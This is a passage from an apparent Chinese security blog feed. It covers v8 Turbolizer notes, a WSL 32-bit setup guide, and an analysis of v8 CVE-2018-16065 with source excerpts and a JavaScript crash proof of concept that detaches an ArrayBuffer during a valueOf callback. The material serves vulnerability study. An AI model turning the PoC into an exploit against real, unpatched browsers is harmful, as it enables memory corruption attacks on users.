class="string">&quot;control&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>视觉效果：</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210429233143544.png" alt="img"></p><p>注意：与 value 边相同，<strong>control 边</strong>的显示效果也是一条<strong>实线</strong>。这意味着单单只看 IR 图的话，是无法将 Control 边和 Value 边区分开的。</p><h2 id="五、参考的源码">五、参考的源码</h2><ul><li>v8/tools/turbolizer/build/turbolizer.js</li><li>v8/src/compiler/graph-visualizer.cc</li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;v8 turbolizer 有助于我们分析 JIT turbofan 的优化方式以及优化过程。但我们常常对于 turbolizer 生成的 IR 图一知半解，不清楚具体符号所代表的意思。以下为笔者阅读相关代码后所做的笔记。&lt;/p&gt;</summary>
    
    
    
    
    <category term="v8" scheme="https://kiprey.github.io/tags/v8/"/>
    
  </entry>
  
  <entry>
    <title>WSL64 运行 32 位程序</title>
    <link href="https://kiprey.github.io/2021/04/i386_WSL64/"/>
    <id>https://kiprey.github.io/2021/04/i386_WSL64/</id>
    <published>2021-04-27T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.020Z</updated>
    
    <content type="html"><![CDATA[<p>WSL1 下执行 x86 程序较为困难，需要进行较多步骤，并且存在局限性;</p><p>WSL2 下可以直接执行 x86 程序，但需要从 WSL1 中升级上去。</p><p>两种操作均较为麻烦，因此这里记录了一点笔者走过的弯路。</p><span id="more"></span><h2 id="1-WSL1">1. WSL1</h2><ul><li><p>直接复制以下指令至 wsl 中，执行完成之后 gcc / g++ 就<strong>可以成功编译 32 位程序并运行</strong>。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 启动32位支持层</span></span><br><span class="line"><span class="built_in">sudo</span> dpkg --add-architecture i386</span><br><span class="line"><span class="built_in">sudo</span> apt-get update</span><br><span class="line"></span><br><span class="line"><span class="comment"># 安装 qemu</span></span><br><span class="line"><span class="built_in">sudo</span> apt install qemu-user-static</span><br><span class="line"></span><br><span class="line"><span class="comment"># 配置 x86 elf 在 qemu 中运行</span></span><br><span class="line"><span class="built_in">sudo</span> update-binfmts --install i386 /usr/bin/qemu-i386-static --magic <span class="string">&#x27;\x7fELF\x01\x01\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x00\x01\x00\x00\x00&#x27;</span> --mask <span class="string">&#x27;\xff\xff\xff\xff\xff\xff\xff\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xf8\xff\xff\xff\xff\xff\xff\xff&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 启动服务</span></span><br><span class="line"><span class="built_in">sudo</span> service binfmt-support start</span><br><span class="line"></span><br><span class="line"><span class="comment"># 将启动服务命令别名 32 写入 .zshrc，并重新加载配置文件</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;alias 32=&#x27;sudo service binfmt-support start&#x27;&quot;</span> &gt;&gt; ~/.zshrc</span><br><span class="line"><span class="built_in">source</span> ~/.zshrc</span><br><span class="line"></span><br><span class="line"><span class="comment"># 安装一些基本x86库</span></span><br><span class="line"><span class="built_in">sudo</span> apt-get install g++-multilib libc6:i386 libgcc1:i386 gcc-9-base:i386 libstdc++6:i386</span><br><span class="line"><span class="built_in">sudo</span> apt autoremove</span><br></pre></td></tr></table></figure></li><li><p>但是，即便可以编译并运行32位程序，但<strong>仍然无法被 gdb 调试</strong>，即 64位的 gdb 无法调试 32 位的程序。</p><p>报错提示所选体系结构 i386 与报告的目标体系结构 i386:x86-64 不兼容：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">warning: Selected architecture i386 is not compatible with reported target architecture i386:x86-64</span><br><span class="line">warning: Architecture rejected target-supplied description</span><br></pre></td></tr></table></figure><p>此时就必须折中，使用以下这种方法:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 在 qemu 中启动调试，端口号为 1234</span></span><br><span class="line">qemu-i386-static -g 1234 &lt;process&gt;</span><br><span class="line"></span><br><span class="line"><span class="comment"># 新开一个终端，启动gdb</span></span><br><span class="line">gdb</span><br><span class="line"><span class="comment"># 在 gdb 中设置架构为 i386（不设置貌似也没事？）</span></span><br><span class="line">pwndbg&gt; <span class="built_in">set</span> architecture i386</span><br><span class="line"><span class="comment"># 连接至本地 1234 的 qemu 端口</span></span><br><span class="line">pwndbg&gt; target remote 127.0.0.1:1234</span><br><span class="line"><span class="comment"># 试图加载符号</span></span><br><span class="line">pwndbg&gt; file &lt;process&gt;</span><br></pre></td></tr></table></figure><p>不过这种方法有局限性，没办法将符号加载出来。</p><p>再一种更硬核的方式就是下载 gdb 源码并编译，不过暂且还没试过。</p><blockquote><p>直到目前为止，WSL64 下运行与调试 32 位程序仍然存在较大的困难。</p><p>所以我选择在 VM 里调试 32 位程序 XD。</p></blockquote></li><li><p>参考：</p><ul><li><a href="https://blog.csdn.net/qq_40827990/article/details/83216139">Linux64位子系统运行32位程序 - CSDN</a></li><li><a href="https://www.codeleading.com/article/24462195544/">Win 64位Linux子系统运行32位elf程序(简洁明了/亲测可用) - 代码先锋网</a></li></ul></li></ul><h2 id="2-WSL2">2. WSL2</h2><ul><li><p><strong>WSL2可以直接运行 32 位程序</strong>（感谢 <a href="https://mundi-xu.github.io/">@mudi-xu</a> 的提醒），因此我们希望 WSL1 最好能在不重装原先 Ubuntu 系统的情况下，直接升级到 WSL2。</p></li><li><p>但需要注意的是：WSL2只能在<strong>18917</strong> 之后的版本中才有。请自行运行命令 <code>winver</code> 以查看 <strong>OS 内部版本</strong>，如果版本低了，则需要升级一下 Windows OS。（现在我准备升级 windows 了 呜呜呜）</p></li><li><p>具体操作如下</p><ul><li>首先，以<strong>管理员权限</strong>执行<code>dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart</code> 以<strong>启用“虚拟机平台”可选功能</strong>，之后<strong>重新启动</strong>计算机。</li><li>计算机重启后，执行 <code>wsl --list --verbose</code>  以查看当前的 WSL 镜像及其版本。</li><li>下载并安装<a href="https://wslstorestorage.blob.core.windows.net/wslblob/wsl_update_x64.msi">适用于 x64 计算机的 WSL2 Linux 内核更新包</a></li><li>之后，执行 <code>wsl --set-version &lt;SubSystemName&gt; 2</code> 以升级 WSL1 至 WSL2。这可能需要几分钟的时间。</li><li>待升级完成后，可以再次执行 <code>wsl --list --verbose</code>以查看当前的 WSL 镜像 &amp; 版本。</li><li>最后执行 <code>wsl --set-default-version 2</code> 以设置之后安装的 Linux 子系统都安装到 WSL2 中。</li></ul></li><li><p>注意点：WSL2 与 VMware 15 <strong>不兼容</strong>。如果需要两者兼得则务必升级 VMware 至 <strong>16 版本</strong>。</p><blockquote><p>升级VMware时无需卸载之前的版本，可以直接双击新安装包升级。</p><p>升级时，务必勾选<strong>启用 Windows Hypervisor Platform</strong>，以支持 WSL2 和 VMware 的兼容。</p></blockquote></li><li><p>WSL2在使用过程中，可能报错：  <strong>参考的对象类型不支持尝试的操作</strong>。</p><p><img src="/2021/04/i386_WSL64/image-20210430132003438.png" alt="img"></p><p>有两种解决方法：</p><ul><li><p>第一种（不推荐）：执行 <code>netsh winsock reset</code>，重置 winsock，并重启。但这种方法只能是临时性质的。</p></li><li><p>第二种（推荐）：下载 <a href="/2021/04/i386_WSL64/NoLsp.zip" title="NoLsp.exe">NoLsp.exe</a>，并以管理员权限执行以下命令：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">NoLsp.exe c:\windows\system32\wsl.exe</span><br></pre></td></tr></table></figure><p>等到出现 <code>Success!</code>之后就可以正常使用 WSL2了。</p><p><img src="/2021/04/i386_WSL64/image-20210430132628877.png" alt="img"></p></li></ul><p>为什么解法2的方式如此独特呢？Proxifier 开发者发现：如果Winsock LSP DLL被加载到其进程中，则wsl.exe将显示此错误。因此最简单的解决方案是使用WSCSetApplicationCategory WinAPI调用wsl.exe来防止这种情况。</p><p>这个调用在<code>HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\AppId Catalog</code>创建了一个wsl.exe的条目：</p><p><img src="/2021/04/i386_WSL64/image-20210430132755231.png" alt="img"></p><p>而这就是解法2的具体技术细节。</p></li><li><p>参考</p><ul><li><a href="https://docs.microsoft.com/zh-cn/windows/wsl/install-win10">适用于 Linux 的 Windows 子系统安装指南 (Windows 10) - microsoft docs</a></li><li><a href="https://blog.csdn.net/weixin_40955163/article/details/100555823">WSL安装及升级WSL2 - CSDN</a></li><li><a href="https://github.com/microsoft/WSL/issues/4177#issuecomment-597736482">Winsock module breaks WSL2 - WSL github issue</a></li></ul></li></ul>]]></content>
    
    
    <summary type="html">&lt;p&gt;WSL1 下执行 x86 程序较为困难，需要进行较多步骤，并且存在局限性;&lt;/p&gt;
&lt;p&gt;WSL2 下可以直接执行 x86 程序，但需要从 WSL1 中升级上去。&lt;/p&gt;
&lt;p&gt;两种操作均较为麻烦，因此这里记录了一点笔者走过的弯路。&lt;/p&gt;</summary>
    
    
    
    
    <category term="wsl" scheme="https://kiprey.github.io/tags/wsl/"/>
    
  </entry>
  
  <entry>
    <title>CVE-2018-16065 分析</title>
    <link href="https://kiprey.github.io/2021/03/CVE-2018-16065/"/>
    <id>https://kiprey.github.io/2021/03/CVE-2018-16065/</id>
    <published>2021-03-03T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.750Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、前言">一、前言</h2><p>CVE-2018-16065 是 v8 中 <code>EmitBigTypedArrayElementStore</code> 函数内部的一个漏洞。该漏洞在检查相应 ArrayBuffer 是否被 Detach（即是否是<code>neutered</code>）之后，执行了一个带有<strong>副作用</strong>的（即<strong>可调用用户 JS callback 代码</strong>的） <code>ToBigInt</code> 函数。而用户可在对应回调函数中将原先通过上述检查的 BigIntArray （即<strong>不是 neutered 的 TypedArray</strong>）重新变成 <code>neutered</code>。</p><p>这将使一部分数据被非法写入至一块已经 Detached 的 ArrayBuffer上。如果 GC 试图回收该 ArrayBuffer 的 backing store ，则会触发 CRASH。</p><span id="more"></span><h2 id="二、环境搭建">二、环境搭建</h2><p>切换 v8 版本，然后编译：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">git checkout 6.8.275.24</span><br><span class="line">gclient <span class="built_in">sync</span></span><br><span class="line">tools/dev/gm.py x64.debug</span><br></pre></td></tr></table></figure><h2 id="三、漏洞细节">三、漏洞细节</h2><ul><li><p>在执行 JS 代码  <code>BigInt64Array.of</code> 函数时，v8 将调用以下 <code>Builtin_TypedArrayOf</code>函数：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// ES6 #sec-%typedarray%.of</span></span><br><span class="line"><span class="built_in">TF_BUILTIN</span>(TypedArrayOf, TypedArrayBuiltinsAssembler) &#123;</span><br><span class="line">  TNode&lt;Context&gt; context = <span class="built_in">CAST</span>(<span class="built_in">Parameter</span>(BuiltinDescriptor::kContext));</span><br><span class="line">  [...]</span><br><span class="line">  <span class="built_in">DispatchTypedArrayByElementsKind</span>(</span><br><span class="line">      elements_kind,</span><br><span class="line">      [&amp;](ElementsKind kind, <span class="type">int</span> size, <span class="type">int</span> typed_array_fun_index) &#123;</span><br><span class="line">        TNode&lt;FixedTypedArrayBase&gt; elements =</span><br><span class="line">            <span class="built_in">CAST</span>(<span class="built_in">LoadElements</span>(new_typed_array));</span><br><span class="line">        <span class="built_in">BuildFastLoop</span>(</span><br><span class="line">            <span class="built_in">IntPtrConstant</span>(<span class="number">0</span>), length,</span><br><span class="line">            [&amp;](Node* index) &#123;</span><br><span class="line">              TNode&lt;Object&gt; item = args.<span class="built_in">AtIndex</span>(index, INTPTR_PARAMETERS);</span><br><span class="line">              TNode&lt;IntPtrT&gt; intptr_index = <span class="built_in">UncheckedCast</span>&lt;IntPtrT&gt;(index);</span><br><span class="line">              <span class="comment">// 如果当前的 TypeArray 是 BigIntArray</span></span><br><span class="line">              <span class="keyword">if</span> (kind == BIGINT64_ELEMENTS || kind == BIGUINT64_ELEMENTS) &#123;</span><br><span class="line">                <span class="comment">// 则剩余操作在 EmitBigTypedArrayElementStore 函数内部完成</span></span><br><span class="line">                <span class="built_in">EmitBigTypedArrayElementStore</span>(new_typed_array, elements,</span><br><span class="line">                                              intptr_index, item, context,</span><br><span class="line">                                              &amp;if_neutered);</span><br><span class="line">              &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                [...]</span><br><span class="line">              &#125;,</span><br><span class="line">            <span class="number">1</span>, ParameterMode::INTPTR_PARAMETERS, IndexAdvanceMode::kPost);</span><br><span class="line">      &#125;);</span><br><span class="line">  [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>对于 BigIntArray 这类 TypedArray，v8 将在该函数中继续调用 <code>EmitBigTypedArrayElementStore</code> 函数，并在其中完成剩余的操作。</p></li><li><p><code>EmitBigTypedArrayElementStore</code> 函数较为简单，先看看源码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">CodeStubAssembler::EmitBigTypedArrayElementStore</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    TNode&lt;JSTypedArray&gt; object, TNode&lt;FixedTypedArrayBase&gt; elements,</span></span></span><br><span class="line"><span class="params"><span class="function">    TNode&lt;IntPtrT&gt; intptr_key, TNode&lt;Object&gt; value, TNode&lt;Context&gt; context,</span></span></span><br><span class="line"><span class="params"><span class="function">    Label* opt_if_neutered)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (opt_if_neutered != <span class="literal">nullptr</span>) &#123;</span><br><span class="line">    <span class="comment">// Check if buffer has been neutered.</span></span><br><span class="line">    Node* buffer = <span class="built_in">LoadObjectField</span>(object, JSArrayBufferView::kBufferOffset);</span><br><span class="line">    <span class="built_in">GotoIf</span>(<span class="built_in">IsDetachedBuffer</span>(buffer), opt_if_neutered);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// 获取 BigInt，其中 ToBigInt 函数会调用 JS 中的 [Object.valueOf] 函数</span></span><br><span class="line">  TNode&lt;BigInt&gt; bigint_value = <span class="built_in">ToBigInt</span>(context, value);</span><br><span class="line">  TNode&lt;RawPtrT&gt; backing_store = <span class="built_in">LoadFixedTypedArrayBackingStore</span>(elements);</span><br><span class="line">  TNode&lt;IntPtrT&gt; offset = <span class="built_in">ElementOffsetFromIndex</span>(intptr_key, BIGINT64_ELEMENTS,</span><br><span class="line">                                                 INTPTR_PARAMETERS, <span class="number">0</span>);</span><br><span class="line">  <span class="built_in">EmitBigTypedArrayElementStore</span>(elements, backing_store, offset, bigint_value);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>我们可以很容易的发现，如果 BigIntArray 的 ArrayBuffer 是 neutered 的，那么就直接跳到指定的 Label 处进行异常处理，不会再继续向下执行，也就是说 <strong>不会再将 elements 写入至 backing_store</strong>。</p><p>但 <code>ToBigInt</code> 函数有点特殊，它将调用 Object.valueOf 属性的函数来获取值，而<strong>这个函数是可以被用户定义的</strong>。如果我们在该函数中，将当前 BigIntArray 的 ArrayBuffer 设置为 neutered ，那么下面执行写入操作时，数据写入的位置将是刚刚被 detach 的 ArrayBuffer 中。这是一步非法操作，如果 GC 试图回收该 ArrayBuffer 的 backing store ，那么这将使 GC 触发崩溃。</p></li><li><p>这里需要说明一下 <code>neutered</code> 的含义。即什么样的 ArrayBuffer 将会被视为 neutered 的？如何设置某个 Array 为 neutered ？</p><ul><li><p>通过查阅 <a href="https://v8docs.nodesource.com/node-10.15/d5/d6e/classv8_1_1_array_buffer.html#ab73b5545800351ec54c4c0ac002f9d81">v8 docs</a> ，我们可以简单了解到，Neuter 这个操作，会将 Buffer 和所有 typed Array 的长度设置为0，从而防止JavaScript访问底层 backing_store。</p></li><li><p>我们再来看一下 v8 中的一个 Runtime 函数：<code>ArrayBufferNeuter</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">RUNTIME_FUNCTION</span>(Runtime_ArrayBufferNeuter) &#123;</span><br><span class="line">  <span class="function">HandleScope <span class="title">scope</span><span class="params">(isolate)</span></span>;</span><br><span class="line">  <span class="built_in">DCHECK_EQ</span>(<span class="number">1</span>, args.<span class="built_in">length</span>());</span><br><span class="line">  Handle&lt;Object&gt; argument = args.<span class="built_in">at</span>(<span class="number">0</span>);</span><br><span class="line">  <span class="comment">// This runtime function is exposed in ClusterFuzz and as such has to</span></span><br><span class="line">  <span class="comment">// support arbitrary arguments.</span></span><br><span class="line">  <span class="comment">// 该函数只对 ArrayBuffer 类型的参数效果，若传入其他类型则引出异常</span></span><br><span class="line">  <span class="keyword">if</span> (!argument-&gt;<span class="built_in">IsJSArrayBuffer</span>()) &#123;</span><br><span class="line">    <span class="built_in">THROW_NEW_ERROR_RETURN_FAILURE</span>(</span><br><span class="line">        isolate, <span class="built_in">NewTypeError</span>(MessageTemplate::kNotTypedArray));</span><br><span class="line">  &#125;</span><br><span class="line">  Handle&lt;JSArrayBuffer&gt; array_buffer = Handle&lt;JSArrayBuffer&gt;::<span class="built_in">cast</span>(argument);</span><br><span class="line">  <span class="comment">// 如果当前 ArrayBuffer 不可被设置为 neuter,则不用继续执行下去，直接返回</span></span><br><span class="line">  <span class="keyword">if</span> (!array_buffer-&gt;<span class="built_in">is_neuterable</span>()) &#123;</span><br><span class="line">    <span class="keyword">return</span> isolate-&gt;<span class="built_in">heap</span>()-&gt;<span class="built_in">undefined_value</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// 如果该 ArrayBuffer 的 backing_store 为空，检查 arraybuffer 的 length 是否为0。这一步是检查当前 ArrayBuffer 是否已经是 neutered 的。</span></span><br><span class="line">  <span class="keyword">if</span> (array_buffer-&gt;<span class="built_in">backing_store</span>() == <span class="literal">nullptr</span>) &#123;</span><br><span class="line">    <span class="built_in">CHECK_EQ</span>(Smi::kZero, array_buffer-&gt;<span class="built_in">byte_length</span>());</span><br><span class="line">    <span class="keyword">return</span> isolate-&gt;<span class="built_in">heap</span>()-&gt;<span class="built_in">undefined_value</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// Shared array buffers should never be neutered.</span></span><br><span class="line">  <span class="built_in">CHECK</span>(!array_buffer-&gt;<span class="built_in">is_shared</span>());</span><br><span class="line">  <span class="built_in">DCHECK</span>(!array_buffer-&gt;<span class="built_in">is_external</span>());</span><br><span class="line">  <span class="comment">// 准备开始 neuter 了，先获取 backing_store 指针和当前 ArrayBuffer 的长度</span></span><br><span class="line">  <span class="type">void</span>* backing_store = array_buffer-&gt;<span class="built_in">backing_store</span>();</span><br><span class="line">  <span class="type">size_t</span> byte_length = <span class="built_in">NumberToSize</span>(array_buffer-&gt;<span class="built_in">byte_length</span>());</span><br><span class="line">  array_buffer-&gt;<span class="built_in">set_is_external</span>(<span class="literal">true</span>);</span><br><span class="line">  <span class="comment">// 将当前 ArrayBuffer 从ArrayBufferTracker中移除</span></span><br><span class="line">  isolate-&gt;<span class="built_in">heap</span>()-&gt;<span class="built_in">UnregisterArrayBuffer</span>(*array_buffer);</span><br><span class="line">  <span class="comment">// 开始执行 neuter 操作</span></span><br><span class="line">  array_buffer-&gt;<span class="built_in">Neuter</span>();</span><br><span class="line">  <span class="comment">// 将backing_store占用的内存空间释放</span></span><br><span class="line">  isolate-&gt;<span class="built_in">array_buffer_allocator</span>()-&gt;<span class="built_in">Free</span>(backing_store, byte_length);</span><br><span class="line">  <span class="keyword">return</span> isolate-&gt;<span class="built_in">heap</span>()-&gt;<span class="built_in">undefined_value</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">JSArrayBuffer::Neuter</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="built_in">CHECK</span>(<span class="built_in">is_neuterable</span>());</span><br><span class="line">  <span class="built_in">CHECK</span>(!<span class="built_in">was_neutered</span>());</span><br><span class="line">  <span class="built_in">CHECK</span>(<span class="built_in">is_external</span>());</span><br><span class="line">  <span class="comment">// 将当前 backing store 移除</span></span><br><span class="line">  <span class="built_in">set_backing_store</span>(<span class="literal">nullptr</span>);</span><br><span class="line">  <span class="comment">// 设置当前 length 为 0</span></span><br><span class="line">  <span class="built_in">set_byte_length</span>(Smi::kZero);</span><br><span class="line">  <span class="built_in">set_was_neutered</span>(<span class="literal">true</span>);</span><br><span class="line">  <span class="built_in">set_is_neuterable</span>(<span class="literal">false</span>);</span><br><span class="line">  <span class="comment">// Invalidate the neutering protector.</span></span><br><span class="line">  Isolate* <span class="type">const</span> isolate = <span class="built_in">GetIsolate</span>();</span><br><span class="line">  <span class="keyword">if</span> (isolate-&gt;<span class="built_in">IsArrayBufferNeuteringIntact</span>()) &#123;</span><br><span class="line">    isolate-&gt;<span class="built_in">InvalidateArrayBufferNeuteringProtector</span>();</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>简单读一下源码，我们也可以很容易的发现，<strong>ArrayBuffer 的 neuter 操作 就是删除 ArrayBuffer 中的 backing store 并重置其 length 字段。</strong></p></li></ul><p>综上所述，neuter 的具体操作已经非常明确了，如果不明确的话还可以使用 <code>%DebugPrint</code> 比较一下 neuter   前后的差异。</p><p>接下来我们看看 Poc。</p></li></ul><h2 id="四、PoC">四、PoC</h2><ul><li><p>POC 如下：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// flags: --allow-natives-syntax --expose-gc</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> array = <span class="keyword">new</span> <span class="title class_">BigInt64Array</span>(<span class="number">11</span>);</span><br><span class="line"><span class="comment">// constructor 返回数组</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">constructor</span>(<span class="params"></span>) &#123; <span class="keyword">return</span> array &#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">evil_callback</span>(<span class="params"></span>) &#123;</span><br><span class="line">  <span class="title function_">print</span>(<span class="string">&quot;callback&quot;</span>);</span><br><span class="line">  %<span class="title class_">ArrayBufferNeuter</span>(array.<span class="property">buffer</span>);</span><br><span class="line">  <span class="title function_">gc</span>();</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0xdeadbeefn</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> evil_object = &#123;<span class="attr">valueOf</span>: evil_callback&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> root = <span class="title class_">BigInt64Array</span>.<span class="property">of</span>.<span class="title function_">call</span>(</span><br><span class="line">  constructor,</span><br><span class="line">  evil_object</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="title function_">gc</span>(); <span class="comment">// trigger</span></span><br></pre></td></tr></table></figure></li><li><p>分析上面的 POC，可以理出一条这样的漏洞触发过程：</p><ul><li>首先执行 BigInt64Array.of.call ，其中 多调用了一个 call 是为了使 constructor 函数和 设置的 element 都可以操作同一个 array。</li><li>初始时， array 的 backing_store 存在，因此将绕过 v8  <code>EmitBigTypedArrayElementStore</code> 函数中的 ArrayBuffer <strong>neutered</strong> 检查，进入 <strong>ToBigInt</strong> 函数。</li><li>ToBigInt 函数将会获取传入 element 的值，因此便会调用 evil_object.valueOf 函数，即调用 evil_callback JS 函数。</li><li>该函数将执行 v8 Runtime 函数 <code>%ArrayBufferNeuter</code>，释放 array 中 ArrayBuffer 的 backing_store。</li><li>完成以上操作后，v8 <code>EmitBigTypedArrayElementStore</code>  函数中的 ToBigInt 函数将返回，此时继续执行，试图将 element 写入之前保存的 backing_store 里。</li><li>由于该 ArrayBuffer 已经被 detached，因此这样的写入将修改该 backing_store 上的一些用于 GC 的元数据，使最后在执行 GC 时触发崩溃。</li></ul></li></ul><blockquote><p><strong>将值写入至 Detached ArrayBuffer</strong> 时，因为其 heap chunk 仍然是 <strong>allocated</strong> 的，因此不存在 UaF。</p></blockquote><ul><li><p>gdb 可能的两种崩溃输出如下：</p><ul><li><p>第一种</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td 